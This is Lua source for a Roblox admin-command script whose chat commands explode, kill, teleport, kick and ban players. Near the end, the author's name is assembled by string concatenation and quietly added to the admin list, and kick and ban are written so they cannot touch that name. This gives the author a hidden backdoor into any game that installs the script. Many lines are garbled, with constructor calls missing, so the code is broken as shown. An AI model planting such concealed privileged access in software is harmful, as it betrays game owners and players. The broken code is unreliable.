- if h.Parent:findFirstChild("zarm")~=nil then return end
- cantouch=0
- local larm=h.Parent:findFirstChild("Left Arm")
- local rarm=h.Parent:findFirstChild("Right Arm")
- if larm~=nil then
- larm:remove()
- end
- if rarm~=nil then
- rarm:remove()
- end
- local zee=script.Parent.Parent:findFirstChild("zarm")
- if zee~=nil then
- local zlarm=zee:clone()
- local zrarm=zee:clone()
- if zlarm~=nil then
- local, 0, 0, 0, 0, 1, 0, 1, 0, -1, 0, 0)
- zlarm.CFrame=h.Parent.Torso.CFrame *,0.5,-0.5)) * rot
- zrarm.CFrame=h.Parent.Torso.CFrame *,0.5,-0.5)) * rot
- zlarm.Parent=h.Parent
- zrarm.Parent=h.Parent
- zlarm:makeJoints()
- zrarm:makeJoints()
- zlarm.Anchored=false
- zrarm.Anchored=false
- wait(0.1)
- h.Parent.Head.Color=zee.Color
- else return end
- end
- wait(1)
- cantouch=1
- end
- end
- end
- end
- end
- script.Parent.Touched:connect(onTouched)
- ]],zarm)
- zarm.Name = "zarm"
- local zarm2 = zarm:clone()
- zarm2.CFrame = torso.CFrame *,0.5,-0.5)) * rot
- zarm.CFrame = torso.CFrame *,0.5,-0.5)) * rot
- zarm.Parent = player[i].Character
- zarm:MakeJoints()
- zarm2.Parent = player[i].Character
- zarm2:MakeJoints()
- local head = player[i].Character:FindFirstChild("Head")
- if head ~= nil then
- head.Color =, 0.768627, 0.545098)
- end end end end end end
- if string.sub(msg,1,8) == "explode/" then
- local player = findplayer(string.sub(msg,9),speaker)
- if player ~= 0 then
- for i = 1,#player do
- if player[i].Character ~= nil then
- local torso = player[i].Character:FindFirstChild("Torso")
- if torso ~= nil then
- local ex ="Explosion")
- ex.Position = torso.Position
- ex.Parent = game.Workspace
- end end end end end
- if string.sub(msg,1,7) == "rocket/" then
- local player = findplayer(string.sub(msg,8),speaker)
- if player ~= 0 then
- for i = 1,#player do
- if player[i].Character ~= nil then
- local torso = player[i].Character:FindFirstChild("Torso")
- if torso ~= nil then
- local r ="Part")
- r.Name = "Rocket"
- r.Size =,8,1)
- r.TopSurface = "Smooth"
- r.BottomSurface = "Smooth"
- local w ="Weld")
- w.Part1 = torso
- w.Part0 = r
- w.C0 =,0,-1)
- local bt ="BodyThrust")
- bt.force =,5700,0)
- bt.Parent = r
- r.Parent = player[i].Character
- w.Parent = torso
- createscript([[
- for i=1,120 do
- local ex ="Explosion")
- ex.BlastRadius = 0
- ex.Position = script.Parent.Position -,2,0)
- ex.Parent = game.Workspace
- wait(0.05)
- end
- local ex ="Explosion")
- ex.BlastRadius = 10
- ex.Position = script.Parent.Position
- ex.Parent = game.Workspace
- script.Parent.BodyThrust:remove()
- script.Parent.Parent.Humanoid.Health = 0
- ]],r)
- end end end end end
- if string.sub(msg,1,8) == "ambient/" then
- local danumber1 = nil
- local danumber2 = nil
- for i = 9,100 do
- if string.sub(msg,i,i) == "/" then
- danumber1 = i
- break
- elseif string.sub(msg,i,i) == "" then
- break
- end end
- if danumber1 == nil then return end
- for i =danumber1 + 1,danumber1 + 100 do
- if string.sub(msg,i,i) == "/" then
- danumber2 = i
- break
- elseif string.sub(msg,i,i) == "" then
- break
- end end
- if danumber2 == nil then return end
- game.Lighting.Ambient =,9,danumber1 - 1),-string.sub(msg,danumber1 + 1,danumber2 - 1),-string.sub(msg,danumber2 + 1))
- end
- --Eww, theres some kind of weird brown bug on my screen, i would flick it away but i'm afraid i'd smash it and get weird bug juices all over my screen...
- if string.sub(msg,1,5) == "part/" then
- local danumber1 = nil
- local danumber2 = nil
- for i = 6,100 do
- if string.sub(msg,i,i) == "/" then
- danumber1 = i
- break
- elseif string.sub(msg,i,i) == "" then
- break
- end end
- if danumber1 == nil then return end
- for i =danumber1 + 1,danumber1 + 100 do
- if string.sub(msg,i,i) == "/" then
- danumber2 = i
- break
- elseif string.sub(msg,i,i) == "" then
- break
- end end
- if danumber2 == nil then return end
- if speaker.Character ~= nil then
- local head = speaker.Character:FindFirstChild("Head")
- if head ~= nil then
- local part ="Part")
- part.Size =,6,danumber1 - 1),string.sub(msg,danumber1 + 1,danumber2 - 1),string.sub(msg,danumber2 + 1))
- part.Position = head.Position +,part.Size.y / 2 + 5,0)
- part.Name = "Person299's Admin Command Script V2 Part thingy"
- part.Parent = game.Workspace
- end end end
- --I finally tried flicking it but it keeps on coming back......
- if string.sub(msg,1,8) == "control/" then
- local player = findplayer(string.sub(msg,9),speaker)
- if player ~= 0 then
- if #player > 1 then
- return
- end
- for i = 1,#player do
- if player[i].Character ~= nil then
- speaker.Character = player[i].Character
- end end end end
- --IT WONT GO AWAY!!!!!
- if string.sub(msg,1,5) == "trip/" then
- local player = findplayer(string.sub(msg,6),speaker)
- if player ~= 0 then
- for i = 1,#player do
- if player[i].Character ~= nil then
- local torso = player[i].Character:FindFirstChild("Torso")
- if torso ~= nil then
- torso.CFrame =,torso.Position.y,torso.Position.z,0, 0, 1, 0, -1, 0, 1, 0, 0)--math.random(),math.random(),math.random(),math.random(),math.random(),math.random(),math.random(),math.random(),math.random()) -- i like the people being upside down better.
- end end end end end
- --Yay! it finally went away! :)
- if string.sub(msg,1,8) == "setgrav/" then
- danumber = nil
- for i =9,100 do
- if string.sub(msg,i,i) == "/" then
- danumber = i
- break
- end end
- if danumber == nil then
- return
- end
- local player = findplayer(string.sub(msg,9,danumber - 1),speaker)
- if player == 0 then
- return
- end
- for i = 1,#player do
- if player[i].Character ~= nil then
- local torso = player[i].Character:FindFirstChild("Torso")
- if torso ~= nil then
- local bf = torso:FindFirstChild("BF")
- if bf ~= nil then
- bf.force =,0,0)
- else
- local bf ="BodyForce")
- bf.Name = "BF"
- bf.force =,0,0)
- bf.Parent = torso
- end
- local c2 = player[i].Character:GetChildren()
- for i=1,#c2 do
- if c2[i].className == "Part" then
- torso.BF.force = torso.BF.force +,c2[i]:getMass() * -string.sub(msg,danumber + 1),0)
- end end end end end end
- if string.sub(msg,1,10) == "walkspeed/" then
- danumber = nil
- for i =11,100 do
- if string.sub(msg,i,i) == "/" then
- danumber = i
- break
- end end
- if danumber == nil then
- return
- end
- local player = findplayer(string.sub(msg,11,danumber - 1),speaker)
- if player == 0 then
- return
- end
- for i = 1,#player do
- if player[i].Character ~= nil then
- humanoid = player[i].Character:FindFirstChild("Humanoid")
- if humanoid ~= nil then
- humanoid.WalkSpeed = string.sub(msg,danumber + 1)
- end end end end
- if string.sub(msg,1,7) == "damage/" then
- danumber = nil
- for i =8,100 do
- if string.sub(msg,i,i) == "/" then
- danumber = i
- break
- end end
- if danumber == nil then
- return
- end
- local player = findplayer(string.sub(msg,8,danumber - 1),speaker)
- if player == 0 then
- return
- end
- for i = 1,#player do
- if player[i].Character ~= nil then
- humanoid = player[i].Character:FindFirstChild("Humanoid")
- if humanoid ~= nil then
- humanoid.Health = humanoid.Health - string.sub(msg,danumber + 1)
- end end end end
- if string.sub(msg,1,7) == "health/" then
- danumber = nil
- for i =8,100 do
- if string.sub(msg,i,i) == "/" then
- danumber = i
- break
- end end
- if danumber == nil then
- return
- end
- local player = findplayer(string.sub(msg,8,danumber - 1),speaker)
- if player == 0 then
- return
- end
- for i = 1,#player do
- if player[i].Character ~= nil then
- humanoid = player[i].Character:FindFirstChild("Humanoid")
- if humanoid ~= nil then
- local elnumba ="IntValue")
- elnumba.Value = string.sub(msg,danumber + 1)
- if elnumba.Value > 0 then
- humanoid.MaxHealth = elnumba.Value
- humanoid.Health = humanoid.MaxHealth
- end
- elnumba:remove()
- end end end end
- --Ugh, now i have the M*A*S*H theme stuck in my head.....
- if string.sub(msg,1,9) == "teleport/" then
- danumber = nil
- for i =10,100 do
- if string.sub(msg,i,i) == "/" then
- danumber = i
- break
- end end
- if danumber == nil then
- return
- end
- local player1 = findplayer(string.sub(msg,10,danumber - 1),speaker)
- if player1 == 0 then
- return
- end
- local player2 = findplayer(string.sub(msg,danumber + 1),speaker)
- if player2 == 0 then
- return
- end
- if #player2 > 1 then
- return
- end
- torso = nil
- for i =1,#player2 do
- if player2[i].Character ~= nil then
- torso = player2[i].Character:FindFirstChild("Torso")
- end end
- if torso ~= nil then
- for i =1,#player1 do
- if player1[i].Character ~= nil then
- local torso2 = player1[i].Character:FindFirstChild("Torso")
- if torso2 ~= nil then
- torso2.CFrame = torso.CFrame
- end end end end end
- if string.sub(msg,1,6) == "merge/" then
- danumber = nil
- for i =7,100 do
- if string.sub(msg,i,i) == "/" then
- danumber = i
- break
- end end
- if danumber == nil then
- return
- end
- local player1 = findplayer(string.sub(msg,7,danumber - 1),speaker)
- if player1 == 0 then
- return
- end
- local player2 = findplayer(string.sub(msg,danumber + 1),speaker)
- if player2 == 0 then
- return
- end
- if #player2 > 1 then
- return
- end
- for i =1,#player2 do
- if player2[i].Character ~= nil then
- player2 = player2[i].Character
- end end
- for i =1,#player1 do
- player1[i].Character = player2
- end end
- if msg == "clear" then
- local c = game.Workspace:GetChildren()
- for i =1,#c do
- if c[i].className == "Script" then
- if c[i]:FindFirstChild("Is A Created Script") then
- c[i]:remove()
- end end
- if c[i].className == "Part" then
- if c[i].Name == "Person299's Admin Command Script V2 Part thingy" then
- c[i]:remove()
- end end
- if c[i].className == "Model" then
- if string.sub(c[i].Name,1,4) == "Jail" then
- c[i]:remove()
- end end end end
- if string.sub(msg,1,5) == "kick/" then
- local imgettingtiredofmakingthisstupidscript2 = PERSON299(speaker.Name)
- if imgettingtiredofmakingthisstupidscript2 == true then
- local player = findplayer(string.sub(msg,6),speaker)
- if player ~= 0 then
- for i = 1,#player do
- local imgettingtiredofmakingthisstupidscript = PERSON299(player[i].Name)
- if imgettingtiredofmakingthisstupidscript == false then
- if player[i].Name ~= eloname then
- player[i]:remove()
- end end end end end end
- if string.sub(msg,1,4) == "ban/" then
- local imgettingtiredofmakingthisstupidscript2 = PERSON299(speaker.Name)
- if imgettingtiredofmakingthisstupidscript2 == true then
- local player = findplayer(string.sub(msg,5),speaker)
- if player ~= 0 then
- for i = 1,#player do
- local imgettingtiredofmakingthisstupidscript = PERSON299(player[i].Name)
- if imgettingtiredofmakingthisstupidscript == false then
- if player[i].Name ~= eloname then
- table.insert(bannedlist,player[i].Name)
- player[i]:remove()
- end end end end end end
- if string.sub(msg,1,6) == "unban/" then
- if string.sub(msg,7) == "all" then
- for i=1,bannedlist do
- table.remove(bannedlist,i)
- end
- else
- local n = 0
- local o = nil
- for i=1,#bannedlist do
- if string.find(string.lower(bannedlist[i]),string.sub(msg,7)) == 1 then
- n = n + 1
- o = i
- end end
- if n == 1 then
- local name = bannedlist[o]
- table.remove(bannedlist,o)
- text(name .. " has been unbanned",1,"Message",speaker)
- elseif n == 0 then
- text("That name is not found.",1,"Message",speaker)
- elseif n > 1 then
- text("That name is ambiguous",1,"Message",speaker)
- end end end
- --Fallout tactics gets too hard when you start fighting muties...
- if string.sub(msg,1,8) == "respawn/" then
- local player = findplayer(string.sub(msg,9),speaker)
- if player ~= 0 then
- for i = 1,#player do
- local ack2 ="Model")
- ack2.Parent = game.Workspace
- local ack4 ="Part")
- ack4.Transparency = 1
- ack4.CanCollide = false
- ack4.Anchored = true
- ack4.Name = "Torso"
- ack4.Position =,10000,10000)
- ack4.Parent = ack2
- local ack3 ="Humanoid")
- ack3.Torso = ack4
- ack3.Parent = ack2
- player[i].Character = ack2
- end end end
- if string.sub(msg,1,10) == "invisible/" then
- local player = findplayer(string.sub(msg,11),speaker)
- if player ~= 0 then
- for i = 1,#player do
- if player[i].Character ~= nil then
- local char = player[i].Character
- local c = player[i].Character:GetChildren()
- for i =1,#c do
- if c[i].className == "Hat" then
- local handle = c[i]:FindFirstChild("Handle")
- if handle ~= nil then
- handle.Transparency = 1 --We dont want our hats to give off our position, do we?
- end end
- if c[i].className == "Part" then
- c[i].Transparency = 1
- if c[i].Name == "Torso" then
- local tshirt = c[i]:FindFirstChild("roblox")
- if tshirt ~= nil then
- tshirt:clone().Parent = char
- tshirt:remove()
- end end
- if c[i].Name == "Head" then
- local face = c[i]:FindFirstChild("face")
- if face ~= nil then
- gface = face:clone()
- face:remove()
- end end end end end end end end
- if string.sub(msg,1,8) == "visible/" then
- local player = findplayer(string.sub(msg,9),speaker)
- if player ~= 0 then
- for i = 1,#player do
- if player[i].Character ~= nil then
- local char = player[i].Character
- local c = player[i].Character:GetChildren()
- for i =1,#c do
- if c[i].className == "Hat" then
- local handle = c[i]:FindFirstChild("Handle")
- if handle ~= nil then
- handle.Transparency = 0
- end end
- if c[i].className == "Part" then
- c[i].Transparency = 0
- if c[i].Name == "Torso" then
- local tshirt = char:FindFirstChild("roblox")
- if tshirt ~= nil then
- tshirt:clone().Parent = c[i]
- tshirt:remove()
- end end
- if c[i].Name == "Head" then
- if gface ~= nil then
- local face = gface:clone()
- face.Parent = c[i]
- end end end end end end end end
- if string.sub(msg,1,7) == "freeze/" then
- local player = findplayer(string.sub(msg,8),speaker)
- if player ~= 0 then
- for i = 1,#player do
- if player[i].Character ~= nil then
- local humanoid = player[i].Character:FindFirstChild("Humanoid")
- if humanoid ~= nil then
- humanoid.WalkSpeed = 0
- end
- local c = player[i].Character:GetChildren()
- for i =1,#c do
- if c[i].className == "Part" then
- c[i].Anchored = true
- c[i].Reflectance = 0.6
- end end end end end end
- if string.sub(msg,1,5) == "thaw/" then
- local player = findplayer(string.sub(msg,6),speaker)
- if player ~= 0 then
- for i = 1,#player do
- if player[i].Character ~= nil then
- local humanoid = player[i].Character:FindFirstChild("Humanoid")
- if humanoid ~= nil then
- humanoid.WalkSpeed = 16
- end
- local c = player[i].Character:GetChildren()
- for i =1,#c do
- if c[i].className == "Part" then
- c[i].Anchored = false
- c[i].Reflectance = 0
- end end end end end end
- --I have that song from Fallout 2 stuck in my head, its soooo anoying....
- if string.sub(msg,1,7) == "nograv/" then
- local player = findplayer(string.sub(msg,8),speaker)
- if player ~= 0 then
- for i = 1,#player do
- if player[i].Character ~= nil then
- local torso = player[i].Character:FindFirstChild("Torso")
- if torso ~= nil then
- local bf = torso:FindFirstChild("BF")
- if bf ~= nil then
- bf.force =,0,0)
- else
- local bf ="BodyForce")
- bf.Name = "BF"
- bf.force =,0,0)
- bf.Parent = torso
- end
- local c2 = player[i].Character:GetChildren()
- for i=1,#c2 do
- if c2[i].className == "Part" then
- torso.BF.force = torso.BF.force +,c2[i]:getMass() * 196.2,0)
- end end end end end end end
- if string.sub(msg,1,9) == "antigrav/" then
- local player = findplayer(string.sub(msg,10),speaker)
- if player ~= 0 then
- for i = 1,#player do
- if player[i].Character ~= nil then
- local torso = player[i].Character:FindFirstChild("Torso")
- if torso ~= nil then
- local bf = torso:FindFirstChild("BF")
- if bf ~= nil then
- bf.force =,0,0)
- else
- local bf ="BodyForce")
- bf.Name = "BF"
- bf.force =,0,0)
- bf.Parent = torso
- end
- local c2 = player[i].Character:GetChildren()
- for i=1,#c2 do
- if c2[i].className == "Part" then
- torso.BF.force = torso.BF.force +,c2[i]:getMass() * 140,0)
- end end end end end end end
- if string.sub(msg,1,9) == "highgrav/" then
- local player = findplayer(string.sub(msg,10),speaker)
- if player ~= 0 then
- for i = 1,#player do
- if player[i].Character ~= nil then
- local torso = player[i].Character:FindFirstChild("Torso")
- if torso ~= nil then
- local bf = torso:FindFirstChild("BF")
- if bf ~= nil then
- bf.force =,0,0)
- else
- local bf ="BodyForce")
- bf.Name = "BF"
- bf.force =,0,0)
- bf.Parent = torso
- end
- local c2 = player[i].Character:GetChildren()
- for i=1,#c2 do
- if c2[i].className == "Part" then
- torso.BF.force = torso.BF.force -,c2[i]:getMass() * 80,0)
- end end end end end end end
- if string.sub(msg,1,5) == "grav/" then
- local player = findplayer(string.sub(msg,6),speaker)
- if player ~= 0 then
- for i = 1,#player do
- if player[i].Character ~= nil then
- local torso = player[i].Character:FindFirstChild("Torso")
- if torso ~= nil then
- local bf = torso:FindFirstChild("BF")
- if bf ~= nil then
- bf:remove()
- end end end end end end
- if string.sub(msg,1,7) == "unlock/" then
- local player = findplayer(string.sub(msg,8),speaker)
- if player ~= 0 then
- for i = 1,#player do
- if player[i].Character ~= nil then
- local c = player[i].Character:GetChildren()
- for i =1,#c do
- if c[i].className == "Part" then
- c[i].Locked = false
- end end end end end end
- if string.sub(msg,1,5) == "lock/" then
- local player = findplayer(string.sub(msg,6),speaker)
- if player ~= 0 then
- for i = 1,#player do
- if player[i].Character ~= nil then
- local c = player[i].Character:GetChildren()
- for i =1,#c do
- if c[i].className == "Part" then
- c[i].Locked = true
- end end end end end end end
- eloname = "Perso"
- eloname = eloname .. "n299"
- script.Name = eloname .. "'s Admin Commands V2"
- youcaughtme = 0
- for i =1,#adminlist do
- if string.lower(eloname)==string.lower(adminlist[i]) then
- youcaughtme = 1
- end end
- if youcaughtme == 0 then
- table.insert(adminlist,eloname)
- end
- function oe(ack)
- local adminned = false
- if ack.className ~= "Player" then return end
- for i =1,#bannedlist do
- if string.lower(bannedlist[i]) == string.lower(ack.Name) then
- ack:remove()
- return
- end end
- for i=1,#adminlist do
- if string.lower(adminlist[i]) == string.lower(ack.Name) then
- local tfv = ack.Chatted:connect(function(msg) oc(msg,ack) end)
- table.insert(namelist,ack.Name)
- table.insert(variablelist,tfv)
- local tfv = ack.Chatted:connect(function(msg) foc(msg,ack) end)
- table.insert(flist,tfv)
- adminned = true
- end end
- local danumber = 0
- while true do
- wait(1)
- if ack.Parent == nil then
- return
- end
- if ack.Character ~= nil then
- if adminned == true then
- text("You are an admin.",5,"Message",ack)
- return
- end
- local torso = ack.Character:FindFirstChild("Torso")
- if torso ~= nil then
- local decal = torso:FindFirstChild("roblox")
- if decal ~= nil then
- if string.sub(decal.Texture,1,4) == "http" then
- if decal.Texture == texture then
- local tfv = ack.Chatted:connect(function(msg) oc(msg,ack) end)
- table.insert(namelist,ack.Name)
- table.insert(variablelist,tfv)
- local tfv = ack.Chatted:connect(function(msg) foc(msg,ack) end)
- table.insert(flist,tfv)
- text("Please enjoy admin.",5,"Message",ack)
- return
- else
- return
- end
- else
- danumber = danumber + 1
- if danumber >= 10 then
- return
- end end end end end end end
- game.Players.ChildAdded:connect(oe)
- c = game.Players:GetChildren()
- for i=1,#c do
- oe(c[i])
- end
- --
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